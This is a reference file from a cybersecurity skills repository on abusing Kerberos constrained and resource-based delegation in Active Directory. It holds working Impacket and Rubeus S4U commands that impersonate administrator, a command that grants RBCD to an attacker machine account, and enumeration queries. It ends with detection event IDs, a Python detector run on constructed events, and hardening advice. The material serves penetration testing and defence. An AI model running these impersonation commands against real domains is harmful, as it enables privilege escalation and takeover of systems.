Anthropic-Cybersecurity-Skills/skills/exploiting-constrained-delegation-abuse/references/api-reference.md
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00


# API Reference: Kerberos Constrained Delegation Abuse
## Delegation Types in AD
| Type | Attribute | Risk |
|------|-----------|------|
| Unconstrained | TrustedForDelegation | CRITICAL |
| Constrained | msDS-AllowedToDelegateTo | HIGH |
| Constrained + Protocol Transition | TrustedToAuthForDelegation | CRITICAL |
| Resource-Based (RBCD) | msDS-AllowedToActOnBehalfOfOtherIdentity | HIGH |
## PowerShell Enumeration
### Find Constrained Delegation
```powershell
# Presence test on msDS-AllowedToDelegateTo; userAccountControl bit 0x1000000 is TrustedToAuthForDelegation
Get-ADObject -Filter 'msDS-AllowedToDelegateTo -like "*"' `
    -Properties msDS-AllowedToDelegateTo, userAccountControl
```
### Find RBCD
```powershell
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity `
| Where-Object {$_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -ne $null}
```
## Impacket — S4U Attack
### getST.py — Request Service Ticket
```bash
getST.py domain/svc_account:password \
-spn cifs/target.domain.local \
-impersonate administrator \
-dc-ip 10.10.10.1
```
### Use Ticket
```bash
export KRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain/administrator@target.domain.local
```
## Rubeus — S4U Attack
### S4U2Self + S4U2Proxy
```cmd
Rubeus.exe s4u /user:svc_account /rc4:NTLM_HASH ^
    /impersonateuser:administrator ^
    /msdsspn:cifs/target.domain.local /ptt
```
### RBCD Abuse
```cmd
Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_HASH ^
    /impersonateuser:administrator ^
    /msdsspn:cifs/target.domain.local /ptt
```
## RBCD Setup with PowerShell
### Set RBCD
```powershell
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount attacker$
```
### Verify
```powershell
Get-ADComputer target -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
```
## BloodHound Cypher Queries
### Constrained Delegation Paths
```cypher
MATCH p=(u)-[:AllowedToDelegate]->(c:Computer)
RETURN u.name, c.name
```
### RBCD Write Access
```cypher
MATCH p=(u)-[:GenericWrite|WriteDacl|WriteOwner]->(c:Computer)
RETURN u.name, c.name
```
## Detection — Event IDs
| Event | Description |
|-------|-------------|
| 4769 | Kerberos Service Ticket (check for S4U) |
| 4770 | Service Ticket Renewed |
| 4768 | TGT Request (monitor for delegation) |
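
One way to act on the "check for S4U" note for event 4769, as an added example that is not part of this repository: it reads the `TransmittedServices` field (shown as "Transited Services" in Event Viewer), which is populated when a ticket was obtained through delegation, and grades each hit. The allowlist, the sensitive-account list, and the sample events are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumptions (hypothetical names): delegation pairs configured on purpose,
# and accounts that should never be carried by a delegated ticket.
APPROVED = {("svc_web", "db01$")}
SENSITIVE = {"administrator"}

def make_event(account, service, transited):
    """Build a CONSTRUCTED 4769 record in the Windows event XML layout."""
    fields = {"TargetUserName": account, "ServiceName": service,
              "TransmittedServices": transited}
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4769</EventID></System>'
            f"<EventData>{data}</EventData></Event>")

def short(name):
    """'svc_web@DOMAIN.LOCAL' -> 'svc_web', lower-cased for comparison."""
    return name.split("@")[0].strip().lower()

def review(event_xml):
    """Return None for ordinary tickets, else a finding for delegated ones."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4769":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.iterfind("e:EventData/e:Data", NS)}
    transited = data.get("TransmittedServices", "-").strip()
    if transited in ("", "-"):          # no delegation recorded on this ticket
        return None
    pair = (short(transited), short(data.get("ServiceName", "")))
    account = short(data.get("TargetUserName", ""))
    if account in SENSITIVE:
        severity = "high"               # privileged identity carried by delegation
    elif pair not in APPROVED:
        severity = "medium"             # delegation path nobody signed off on
    else:
        severity = "info"               # expected, documented delegation
    return {"delegator": pair[0], "service": pair[1],
            "account": account, "severity": severity}

SAMPLES = [  # constructed events, not real logs
    make_event("alice@DOMAIN.LOCAL", "krbtgt", "-"),
    make_event("bob@DOMAIN.LOCAL", "DB01$", "svc_web@DOMAIN.LOCAL"),
    make_event("administrator@DOMAIN.LOCAL", "TARGET$", "svc_account@DOMAIN.LOCAL"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(review(sample))
```

Marking privileged accounts as "Account is sensitive and cannot be delegated", or adding them to Protected Users, prevents the high-severity case from succeeding at all.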